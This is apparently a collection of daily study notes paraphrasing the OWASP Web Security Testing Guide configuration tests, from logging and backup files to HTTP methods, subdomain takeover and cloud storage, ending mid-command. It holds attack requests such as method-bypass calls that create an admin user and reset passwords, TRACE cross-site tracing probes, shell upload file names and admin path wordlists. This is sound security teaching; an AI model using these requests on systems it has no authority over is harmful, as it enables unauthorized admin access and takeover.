2. Validate that no debugging code or extensions are left in the production environments.
3. Review the logging mechanisms set in place for the application.
How to Test
Black-Box Testing
Sample and Known Files and Directories
Many web servers and application servers provide, in a default installation, sample applications and files for the benefit of the developer and in order to test that the server is working properly right after installation. However, many default web server applications have been later known to be vulnerable. This was the case, for example, for CVE-1999-0449 (Denial of Service in IIS when the Exair sample site had been installed)
Comment Review -
It is very common for programmers to add comments when developing large web-based applications. However, comments included inline in HTML code might reveal internal information that should not be available to an attacker. Sometimes, even source code is commented out since a functionality is no longer required, but this comment is leaked out to the HTML pages returned to the users unintentionally.
System Configuration -
Various tools, documents, or checklists can be used to give IT and security professionals a detailed assessment of target systems’ conformance to various configuration baselines or benchmarks.
Gray-Box Testing
Configuration Review -
The web server or application server configuration takes an important role in protecting the contents of the site and it must be carefully reviewed in order to spot common configuration mistakes.
It is impossible to generically say how a server should be configured, however, some common guidelines should be taken into account:
1. Make sure the server software properly logs both legitimate access and errors.
2. Make sure that the server is configured to properly handle overloads and prevent Denial of Service attacks. Ensure that the server has been performance-tuned properly.
3. Never grant non-administrative identities (with the exception of NT SERVICE\WMSvc) access to applicationHost.config, redirection.config, and administration.config (either Read or Write access). This includes Network Service, IIS_IUSRS, IUSR, or any custom identity used by IIS application pools. IIS worker processes are not meant to access any of these files directly.
4. Never share out applicationHost.config, redirection.config, and administration.config on the network. When using Shared Configuration, prefer to export applicationHost.config to another location (see the section titled “Setting Permissions for Shared Configuration).
5. Keep in mind that all users can read .NET Framework machine.config and root web.config files by default. Do not store sensitive information in these files if it should be for administrator eyes only.
6. Do not grant Write access to the identity that the Web server uses to access the shared applicationHost.config. This identity should have only Read access.
Logging
Logging is an important asset of the security of an application architecture, since it can be used to detect flaws in applications (users constantly trying to retrieve a file that does not really exist) as well as sustained attacks from rogue users.
1. Do the logs contain sensitive information?
2. Are the logs stored in a dedicated server?
3. Can log usage generate a Denial of Service condition?
4. How are they rotated? Are logs kept for the sufficient time?
5. How are logs reviewed? Can administrators use these reviews to detect targeted attacks?
6. How are log backups preserved?
7. Is the data being logged data validated (min/max length, chars etc) prior to being logged?
Sensitive Information in Logs
Some applications might, for example, use GET requests to forward form data which will be seen in the server logs. This means that server logs might contain sensitive information (such as usernames as passwords, or bank account details). This sensitive information can be misused by an attacker if they obtained the logs, for example, through administrative interfaces or known web server vulnerabilities or misconfiguration (like the well-known server-status misconfiguration in Apache-based HTTP servers).
Event logs will often contain data that is useful to an attacker (information leakage) or can be used directly in exploits:
Debug information, Stack traces, Usernames, System component names, Internal IP addresses, Less sensitive personal data (e.g. email addresses, postal addresses and telephone numbers associated with named individuals), Business data
Also, in some jurisdictions, storing some sensitive information in log files, such as personal data, might oblige the enterprise to apply the data protection laws that they would apply to their back-end databases to log files too. And failure to do so, even unknowingly, might carry penalties under the data protection laws that apply.
Log Location
Typically servers will generate local logs of their actions and errors, consuming the disk of the system the server is running on. However, if the server is compromised its logs can be wiped out by the intruder to clean up all the traces of its attack and methods. If this were to happen the system administrator would have no knowledge of how the attack occurred or where the attack source was located. Actually, most attacker tool kits include a ‘‘log zapper ‘’ that is capable of cleaning up any logs that hold given information (like the IP address of the attacker) and are routinely used in attacker’s system-level root kits.
Log Storage
Logs can introduce a Denial of Service condition if they are not properly stored. Any attacker with sufficient resources could be able to produce a sufficient number of requests that would fill up the allocated space to log files, if they are not specifically prevented from doing so. However, if the server is not properly configured, the log files will be stored in the same disk partition as the one used for the operating system software or the application itself. This means that if the disk were to be filled up the operating system or the application might fail because it is unable to write on disk.
Log Rotation
Most servers (but few custom applications) will rotate logs in order to prevent them from filling up the file system they reside on. The assumption when rotating logs is that the information in them is only necessary for a limited amount of time.
This feature should be tested in order to ensure that:
1. Logs are kept for the time defined in the security policy, not more and not less.
2. Logs are compressed once rotated (this is a convenience, since it will mean that more logs will be stored for the same available disk space).
3. File system permission of rotated log files are the same (or stricter) that those of the log files itself. For example, web servers will need to write to the logs they use but they don’t actually need to write to rotated logs, which means that the permissions of the files can be changed upon rotation to prevent the web server process from modifying these.
Log Access Control
Event log information should never be visible to end users. Even web administrators should not be able to see such logs since it breaks separation of duty controls. Ensure that any access control schema that is used to protect access to raw logs and any applications providing capabilities to view or search the logs is not linked with access control schemas for other application user roles. Neither should any log data be viewable by unauthenticated users.
Note - I am making notes from Official OWASP Website you can check it from here
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just Sharing what I learn for help Other's !!!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 24 Task.md
================================================
🎯 Day 24 Task
✅ THM Room
https://tryhackme.com/room/vulnversity
✅ 4.2.3 Test File Extensions Handling for Sensitive Information
Test Objectives
1. Dirbust sensitive file extensions, or extensions that might contain raw data (e.g. scripts, raw data, credentials, etc.).
2. Validate that no system framework bypasses exist on the rules set.
How to Test
Forced Browsing
Submit requests with different file extensions and verify how they are handled. The verification should be on a per web directory basis. Verify directories that allow script execution. Web server directories can be identified by scanning tools which look for the presence of well-known directories. In addition, mirroring the web site structure allows the tester to reconstruct the tree of web directories served by the application.
If the web application architecture is load-balanced, it is important to assess all of the web servers. This may or may not be easy, depending on the configuration of the balancing infrastructure. In an infrastructure with redundant components there may be slight variations in the configuration of individual web or application servers. This may happen if the web architecture employs heterogeneous technologies (think of a set of IIS and Apache web servers in a load-balancing configuration, which may introduce slight asymmetric behavior between them, and possibly different vulnerabilities).
Example
The tester has identified the existence of a file named connection.inc. Trying to access it directly gives back its contents, which are:
```
```
The following file extensions should never be returned by a web server, since they are related to files which may contain sensitive information or to files for which there is no reason to be served.
File Upload
1. file.phtml gets processed as PHP code.
2. FILE~1.PHT is served, but not processed by the PHP ISAPI handler.
3. shell.phPWND can be uploaded.
4. SHELL~1.PHP will be expanded and returned by the OS shell, then processed by the PHP ISAPI handler.
Gray-Box Testing
Performing white-box testing against file extensions handling amounts to checking the configurations of web servers or application servers taking part in the web application architecture, and verifying how they are instructed to serve different file extensions.
If the web application relies on a load-balanced, heterogeneous infrastructure, determine whether this may introduce different behavior.
✅ Tools
HTTrack
wget
curl
Note - I am making notes from Official OWASP Website you can check it from here
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just Sharing what I learn for help Other's !!!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 25 Task.md
================================================
🎯 Day 25 Task
✅ THM Room
https://tryhackme.com/room/principlesofsecurity
✅ 4.2.4 Review Old Backup and Unreferenced Files for Sensitive Information
Test Objectives
Find and analyse unreferenced files that might contain sensitive information.
How to Test
Black-Box Testing
Inference from the Naming Scheme Used for Published Content
Enumerate all of the application’s pages and functionality. This can be done manually using a browser, or using an application spidering tool. Most applications use a recognizable naming scheme, and organize resources into pages and directories using words that describe their function. From the naming scheme used for published content, it is often possible to infer the name and location of unreferenced pages. For example, if a page viewuser.asp is found, then look also for edituser.asp, adduser.asp and deleteuser.asp. If a directory /app/user is found, then look also for /app/admin and /app/manager
Other Clues in Published Content
Many web applications leave clues in published content that can lead to the discovery of hidden pages and functionality. These clues often appear in the source code of HTML and JavaScript files. The source code for all published content should be manually reviewed to identify clues about other pages and functionality. For example:
Programmers’ comments and commented-out sections of source code may refer to hidden content:
```
```
JavaScript may contain page links that are only rendered within the user’s GUI under certain circumstances:
```
var adminUser=false;
if (adminUser) menu.add (new menuItem ("Maintain users", "/admin/useradmin.jsp"));
```
HTML pages may contain FORMs that have been hidden by disabling the SUBMIT element:
```
```
Another source of clues about unreferenced directories is the /robots.txt file used to provide instructions to web robots:
```
User-agent: *
Disallow: /Admin
Disallow: /uploads
Disallow: /backup
Disallow: /~jbloggs
Disallow: /include
```
Blind Guessing
1. Identify the file extensions in use within known areas of the application (e.g. jsp, aspx, html), and use a basic wordlist appended with each of these extensions (or use a longer list of common extensions if resources permit).
2. For each file identified through other enumeration techniques, create a custom wordlist derived from that filename. Get a list of common file extensions (including ~, bak, txt, src, dev, old, inc, orig, copy, tmp, swp, etc.) and use each extension before, after, and instead of, the extension of the actual filename
Information Obtained Through Server Vulnerabilities and Misconfiguration
The most obvious way in which a misconfigured server may disclose unreferenced pages is through directory listing. Request all enumerated directories to identify any which provide a directory listing.
1. Apache ?M=D directory listing vulnerability.
3. Various IIS script source disclosure vulnerabilities.
4. IIS WebDAV directory listing vulnerabilities.
Use of Publicly Available Information
Pages that used to be referenced may still appear in the archives of Internet search engines. For example, 1998results.asp may no longer be linked from a company’s website, but may remain on the server and in search engine databases. This old script may contain vulnerabilities that could be used to compromise the entire site. The site: Google search operator may be used to run a query only against the domain of choice, such as in: site:www.example.com. Using search engines in this way has lead to a broad array of techniques which you may find useful and that are described in the Google Hacking section of this Guide. Check it to hone your testing skills via Google. Backup files are not likely to be referenced by any other files and therefore may have not been indexed by Google, but if they lie in browsable directories the search engine might know about them.
Filename Filter Bypass
Because deny list filters are based on regular expressions, one can sometimes take advantage of obscure OS filename expansion features in which work in ways the developer didn’t expect. The tester can sometimes exploit differences in ways that filenames are parsed by the application, web server, and underlying OS and it’s filename conventions.
1. Remove incompatible characters
2. Convert spaces to underscores
3. Take the first six characters of the basename
4. Add ~ which is used to distinguish files with names using the same six initial characters
5. This convention changes after the first 3 cname ollisions
6. Truncate file extension to three characters
7. Make all the characters uppercase
Tools
wget
nessus
curl
Note - I am making notes from Official OWASP Website you can check it from here
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just Sharing what I learn for help Other's !!!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 26 Task.md
================================================
🎯 Day 26 Task
✅ THM Room
https://tryhackme.com/room/linuxfundamentalspart2
✅ 4.2.5 Enumerate Infrastructure and Application Admin Interfaces
Test Objectives
Identify hidden administrator interfaces and functionality.
How to Test
Black-Box Testing
1. Directory and file enumeration. An administrative interface may be present but not visibly available to the tester. Attempting to guess the path of the administrative interface may be as simple as requesting: /admin or /administrator etc.. or in some scenarios can be revealed within seconds using Google dorks.
2. There are many tools available to perform brute forcing of server contents, see the tools section below for more information. A tester may have to also identify the filename of the administration page. Forcibly browsing to the identified page may provide access to the interface.
3. Comments and links in source code. Many sites use common code that is loaded for all site users. By examining all source sent to the client, links to administrator functionality may be discovered and should be investigated.
4. Reviewing server and application documentation. If the application server or application is deployed in its default configuration it may be possible to access the administration interface using information described in configuration or help documentation. Default password lists should be consulted if an administrative interface is found and credentials are required.
5. Publicly available information. Many applications such as WordPress have default administrative interfaces .
6. Alternative server port. Administration interfaces may be seen on a different port on the host than the main application. For example, Apache Tomcat’s Administration interface can often be seen on port 8080.
7. Parameter tampering. A GET or POST parameter or a cookie variable may be required to enable the administrator functionality. Clues to this include the presence of hidden fields such as:
```
```
or in a cookie:
```
Cookie: session_cookie; useradmin=0
```
Once an administrative interface has been discovered, a combination of the above techniques may be used to attempt to bypass authentication. If this fails, the tester may wish to attempt a brute force attack. In such an instance the tester should be aware of the potential for administrative account lockout if such functionality is present.
Gray-Box Testing
Each web framework may have its own admin default pages or path. For example
WebSphere:
```
/admin
/admin-authz.xml
/admin.conf
/admin.passwd
/admin/*
/admin/logon.jsp
/admin/secure/logon.jsp
```
PHP:
```
/phpinfo
/phpmyadmin/
/phpMyAdmin/
/mysqladmin/
/MySQLadmin
/MySQLAdmin
/login.php
/logon.php
/xmlrpc.php
/dbadmin
```
FrontPage:
```
/admin.dll
/admin.exe
/administrators.pwd
/author.dll
/author.exe
/author.log
/authors.pwd
/cgi-bin
```
WebLogic:
```
/AdminCaptureRootCA
/AdminClients
/AdminConnections
/AdminEvents
/AdminJDBC
/AdminLicense
/AdminMain
/AdminProps
/AdminRealm
/AdminThreads
```
WordPress:
```
wp-admin/
wp-admin/about.php
wp-admin/admin-ajax.php
wp-admin/admin-db.php
wp-admin/admin-footer.php
wp-admin/admin-functions.php
wp-admin/admin-header.php
```
Tools
1. BurpSuite/ZAP
3. https://github.com/vanhauser-thc/thc-hydra
Default-Wordlist :- https://cirt.net/passwords
Logins.txt :- https://github.com/fuzzdb-project/fuzzdb/blob/master/discovery/predictable-filepaths/login-file-locations/Logins.txt
Common admin/debugging parameters :- https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/business-logic/CommonDebugParamNames.txt
Note - I am making notes from Official OWASP Website you can check it from here
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just Sharing what I learn for help Other's !!!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 27 Task.md
================================================
🎯 Day 27 Task
✅ THM Room
https://tryhackme.com/room/activerecon
✅ Web App Pentesting - HTTP Headers & Methods Video by
https://youtu.be/8q5mc1AEtYo
✅ 4.2.6 Test HTTP Methods
Test Objectives
1. Enumerate supported HTTP methods.
2. Test for access control bypass.
3. Test XST vulnerabilities.
4. Test HTTP method overriding techniques.
How to Test
Discover the Supported Methods
To perform this test, the tester needs some way to figure out which HTTP methods are supported by the web server that is being examined. While the OPTIONS HTTP method provides a direct way to do that, verify the server’s response by issuing requests using different methods. This can be achieved by manual testing or something like the http-methods Nmap script.
To use the http-methods Nmap script to test the endpoint /index.php on the server localhost using HTTPS, issue the command:
```
nmap -p 443 --script http-methods --script-args http-methods.url-path='/index.php' localhost
```
Testing the PUT Method
1. Capture the base request of the target with a web proxy.
2. Change the request method to PUT and add test.html file and send the request to the application server.
```
PUT /test.html HTTP/1.1
Host: testing-website
HTTP PUT Method is Enabled
```
3. If the server response with 2XX success codes or 3XX redirections and then confirm by GET request for test.html file. The application is vulnerable.
Testing for Access Control Bypass
Find a page to visit that has a security constraint such that a GET request would normally force a 302 redirect to a log in page or force a log in directly. Issue requests using various methods such as HEAD, POST, PUT etc. as well as arbitrarily made up methods such as BILBAO, FOOBAR, CATS, etc. If the web application responds with a HTTP/1.1 200 OK that is not a log in page, it may be possible to bypass authentication or authorization
```
$ ncat www.example.com 80
HEAD /admin HTTP/1.1
Host: www.example.com
HTTP/1.1 200 OK
Date: Mon, 18 Aug 2008 22:44:11 GMT
Server: Apache
Set-Cookie: PHPSESSID=pKi...; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: adminOnlyCookie1=...; expires=Tue, 18-Aug-2009 22:44:31 GMT; domain=www.example.com
Set-Cookie: adminOnlyCookie2=...; expires=Mon, 18-Aug-2008 22:54:31 GMT; domain=www.example.com
Set-Cookie: adminOnlyCookie3=...; expires=Sun, 19-Aug-2007 22:44:30 GMT; domain=www.example.com
Content-Language: EN
Connection: close
Content-Type: text/html; charset=ISO-8859-1
```
If the system appears vulnerable, issue CSRF-like attacks such as the following to exploit the issue more fully:
```
HEAD /admin/createUser.php?member=myAdmin
```
```
PUT /admin/changePw.php?member=myAdmin&passwd=foo123&confirm=foo123
```
```
CATS /admin/groupEdit.php?group=Admins&member=myAdmin&action=add
```
Using the above three commands, modified to suit the application under test and testing requirements, a new user would be created, a password assigned, and the user made an administrator, all using blind request submission
Testing for Cross-Site Tracing Potential
Note: in order to understand the logic and the goals of a cross-site tracing (XST) attack, one must be familiar with cross-site scripting attacks.
The TRACE method, intended for testing and debugging, instructs the web server to reflect the received message back to the client. This method, while apparently harmless, can be successfully leveraged in some scenarios to steal legitimate users’ credentials. This attack technique was discovered by Jeremiah Grossman in 2003, in an attempt to bypass the HttpOnly attribute that aims to protect cookies from being accessed by JavaScript. However, the TRACE method can be used to bypass this protection and access the cookie even when this attribute is set.
Test for cross-site tracing potential by issuing a request such as the following:
```
$ ncat www.victim.com 80
TRACE / HTTP/1.1
Host: www.victim.com
Random: Header
HTTP/1.1 200 OK
Random: Header
...
```
The web server returned a 200 and reflected the random header that was set in place. To further exploit this issue:
```
$ ncat www.victim.com 80
TRACE / HTTP/1.1
Host: www.victim.com
Attack:
```
The above example works if the response is being reflected in the HTML context.
Testing for HTTP Method Overriding
Some web frameworks provide a way to override the actual HTTP method in the request by emulating the missing HTTP verbs passing some custom header in the requests. The main purpose of this is to circumvent some middleware (e.g. proxy, firewall) limitation where methods allowed usually do not encompass verbs such as PUT or DELETE. The following alternative headers could be used to do such verb tunneling:
**X-HTTP-Method**
**X-HTTP-Method-Override**
**X-Method-Override**
In order to test this, in the scenarios where restricted verbs such as PUT or DELETE return a “405 Method not allowed”, replay the same request with the addition of the alternative headers for HTTP method overriding, and observe how the system responds. The application should respond with a different status code (e.g. 200) in cases where method overriding is supported.
The web server in the following example does not allow the DELETE method and blocks it:
```
$ ncat www.example.com 80
DELETE /resource.html HTTP/1.1
Host: www.example.com
HTTP/1.1 405 Method Not Allowed
Date: Sat, 04 Apr 2020 18:26:53 GMT
Server: Apache
Allow: GET,HEAD,POST,OPTIONS
Content-Length: 320
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
```
After adding the X-HTTP-Method header, the server responds to the request with a 200:
```
$ ncat www.example.com 80
DELETE /resource.html HTTP/1.1
Host: www.example.com
X-HTTP-Method: DELETE
HTTP/1.1 200 OK
Date: Sat, 04 Apr 2020 19:26:01 GMT
Server: Apache
```
Tools
1. Netcat
2. cURL
3. BurpSuite/ZAP
Note - I am making notes from Official OWASP Website you can check it from here
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just Sharing what I learn for help Other's !!!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 28 Task.md
================================================
🎯 Day 28 Task
✅ THM Room
https://tryhackme.com/room/walkinganapplication
✅ 4.2.7 Test HTTP Strict Transport Security (HSTS)
The HTTP Strict Transport Security (HSTS) feature lets a web application inform the browser through the use of a special response header that it should never establish a connection to the specified domain servers using un-encrypted HTTP. Instead, it should automatically establish all connection requests to access the site through HTTPS. It also prevents users from overriding certificate errors.
The HTTP strict transport security header uses two directives:
1. **max-age**: to indicate the number of seconds that the browser should automatically convert all HTTP requests to HTTPS.
2. **includeSubDomains**: to indicate that all related sub-domains must use HTTPS.
3. **preload Unofficial**: to indicate that the domain(s) are on the preload list(s) and that browsers should never connect without HTTPS.
Here’s an example of the HSTS header implementation:
```
Strict-Transport-Security: max-age=31536000; includeSubDomains
```
The use of this header by web applications must be checked to find if the following security issues could be produced:
1. Attackers sniffing the network traffic and accessing the information transferred through an un-encrypted channel.
2. Attackers exploiting a manipulator in the middle attack because of the problem of accepting certificates that are not trusted.
3. Users who mistakenly entered an address in the browser putting HTTP instead of HTTPS, or users who click on a link in a web application which mistakenly indicated use of the HTTP protocol.
Test Objectives
Review the HSTS header and its validity.
How to Test
The presence of the HSTS header can be confirmed by examining the server’s response through an intercepting proxy or by using curl as follows:
```
curl -s -D- https://owasp.org | grep -i strict
Strict-Transport-Security: max-age=31536000
```
Note - I am making notes from Official OWASP Website you can check it from here
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just Sharing what I learn for help Other's !!!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 29 Task.md
================================================
🎯 Day 29 Task
✅ THM Room
https://tryhackme.com/room/sqlinjectionlm
✅ 4.2.8 Test RIA Cross Domain Policy
Test Objectives - Review and validate the policy files.
What are cross-domain policy files?
A cross-domain policy file specifies the permissions that a web client such as Java, Adobe Flash, Adobe Reader, etc. use to access data across different domains. For Silverlight, Microsoft adopted a subset of the Adobe’s crossdomain.xml, and additionally created it’s own cross-domain policy file: clientaccesspolicy.xml.
Whenever a web client detects that a resource has to be requested from other domain, it will first look for a policy file in the target domain to determine if performing cross-domain requests, including headers, and socket-based connections are allowed.
**Crossdomain.xml** vs. **Clientaccesspolicy.xml**
Most RIA applications support crossdomain.xml. However in the case of Silverlight, it will only work if the crossdomain.xml specifies that access is allowed from any domain. For more granular control with Silverlight, clientaccesspolicy.xml must be used.
Policy files grant several types of permissions:
1. Accepted policy files (Master policy files can disable or restrict specific policy files)
2. Sockets permissions
3. Header permissions
4. HTTP/HTTPS access permissions
5. Allowing access based on cryptographic credentials
An example of an overly permissive policy file:
```
```
How can cross domain policy files can be abused?
Overly permissive cross-domain policies.
Generating server responses that may be treated as cross-domain policy files.
Using file upload functionality to upload files that may be treated as cross-domain policy files.
Impact of Abusing Cross-Domain Access
1. Defeat CSRF protections.
2. Read data restricted or otherwise protected by cross-origin policies.
How to Test - Testing for RIA Policy Files Weakness
To test for RIA policy file weakness the tester should try to retrieve the policy files crossdomain.xml and clientaccesspolicy.xml from the application’s root, and from every folder found.
For example, if the application’s URL is http://www.owasp.org, the tester should try to download the files http://www.owasp.org/crossdomain.xml and http://www.owasp.org/clientaccesspolicy.xml.
For example, if the application’s URL is http://www.owasp.org, the tester should try to download the files http://www.owasp.org/crossdomain.xml and http://www.owasp.org/clientaccesspolicy.xml.
After retrieving all the policy files, the permissions allowed should be be checked under the least privilege principle. Requests should only come from the domains, ports, or protocols that are necessary. Overly permissive policies should be avoided. Policies with * in them should be closely examined.
Example
```
```
Result Expected
1. A list of policy files found.
2. A list of weak settings in the policies.
✅ Tools - Nikto, BurpSuite/ZAP
Note - I am making notes from Official OWASP Website you can check it from here
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just Sharing what I learn for help Other's !!!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 30 Task.md
================================================
🎯 Day 30 Task
✅ THM Room
https://tryhackme.com/room/windowsfundamentals2x0x
✅ 4.2.9 Test File Permission
Test Objectives - Review and identify any rogue file permissions.
How to Test
In Linux, use ls command to check the file permissions. Alternatively, namei can also be used to recursively list file permissions.
```
namei -l /PathToCheck/
```
The files and directories that require file permission testing include but are not limited to:
1. Web files/directory
2. Configuration files/directory
3. Sensitive files (encrypted data, password, key)/directory
4. Log files (security logs, operation logs, admin logs)/directory
5. Executables (scripts, EXE, JAR, class, PHP, ASP)/directory
6. Database files/directory
7. Temp files /directory
8. Upload files/directory
Remediation
Set the permissions of the files and directories properly so that unauthorized users cannot access critical resources unnecessarily.
Tools - https://linux.die.net/man/1/namei
Note - I am making notes from Official OWASP Website you can check it from here
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just Sharing what I learn for help Other's !!!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 31 Task.md
================================================
🎯 Day 31 Task
✅ THM Room
https://tryhackme.com/room/burpsuitebasics
✅ 4.2.10 Test for Subdomain Takeover
✅ https://0xpatrik.com/subdomain-takeover-basics/
Test Objectives
1. Enumerate all possible domains (previous and current).
2. Identify forgotten or misconfigured domains.
How to Test
Black-Box Testing
The first step is to enumerate the victim DNS servers and resource records. There are multiple ways to accomplish this task, for example DNS enumeration using a list of common subdomains dictionary, DNS brute force or using web search engines and other OSINT data sources.
Using the dig command the tester looks for the following DNS server response messages that warrant further investigation:
**NXDOMAIN**
**SERVFAIL**
**REFUSED**
**no servers could be reached.
**
Testing DNS A, CNAME Record Subdomain Takeover
Perform a basic DNS enumeration on the victim’s domain (victim.com) using dnsrecon:
```
$ ./dnsrecon.py -d victim.com
[*] Performing General Enumeration of Domain: victim.com
...
[-] DNSSEC is not configured for victim.com
[*] A subdomain.victim.com 192.30.252.153
[*] CNAME subdomain1.victim.com fictioussubdomain.victim.com
...
```
Identify which DNS resource records are dead and point to inactive/not-used services. Using the dig command for the CNAME record:
```
$ dig CNAME fictioussubdomain.victim.com
; <<>> DiG 9.10.3-P4-Ubuntu <<>> ns victim.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 42950
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1
```
The following DNS responses warrant further investigation: NXDOMAIN.
To test the A record the tester performs a whois database lookup and identifies GitHub as the service provider:
```
$ whois 192.30.252.153 | grep "OrgName"
OrgName: GitHub, Inc.
```
The tester visits subdomain.victim.com or issues a HTTP GET request which returns a “404 - File not found” response which is a clear indication of the vulnerability.
Testing NS Record Subdomain Takeover
Identify all nameservers for the domain in scope:
```
$ dig ns victim.com +short
ns1.victim.com
nameserver.expireddomain.com
```
In this fictious example the tester checks if the domain expireddomain.com is active with a domain registrar search. If the domain is available for purchase the subdomain is vulnerable.
The following DNS responses warrant further investigation: SERVFAIL or REFUSED.
Gray-Box Testing
The tester has the DNS zone file available which means DNS enumeration is not necessary. The testing methodology is the same.
Tools -
Subdomain Enum Tools - Amass, Subfinder, Assetfinder
dig
dnsrecon
Note - I am making notes from Official OWASP Website you can check it from here
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just Sharing what I learn for help Other's !!!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 32 Task.md
================================================
🎯 Day 32 Task
✅ THM Room
https://tryhackme.com/room/burpsuiterepeater
-----------------------------------------------------------------------------------------------------------------------------------------------
eJPT Journey (with consistency)
🎯 eJPT Day 1
🔃 Introduction (1-3)
1. The Information Security Field - Study Guide
3. Cryptography & VPNs - Study Guide
3. Wireshark Introduction - Study Guide
Wireshark Additional Resources
Cheat Sheets : - https://www.comparitech.com/net-admin/wireshark-cheat-sheet/
Hindi - Youtube : - https://youtu.be/a-Fg7VVDf14
English - Youtube : - https://youtu.be/4_7A8Ikp5Cc
**Note:- eJPT Material are very good for cracking the eJPT exam but I share some additional resource for learning !!!**
----------------------------------------------------------------------------------------------------------------------------------------------
✅ 4.2.11 Test Cloud Storage
Test Objectives - Assess that the access control configuration for the storage services is properly in place.
How to Test
First identify the URL to access the data in the storage service, and then consider the following tests:
**read the unauthorized data**
**upload a new arbitrary file**
You may use curl for the tests with the following commands and see if unauthorized actions can be performed successfully.
To test the ability to read an object:
```
curl -X GET https:///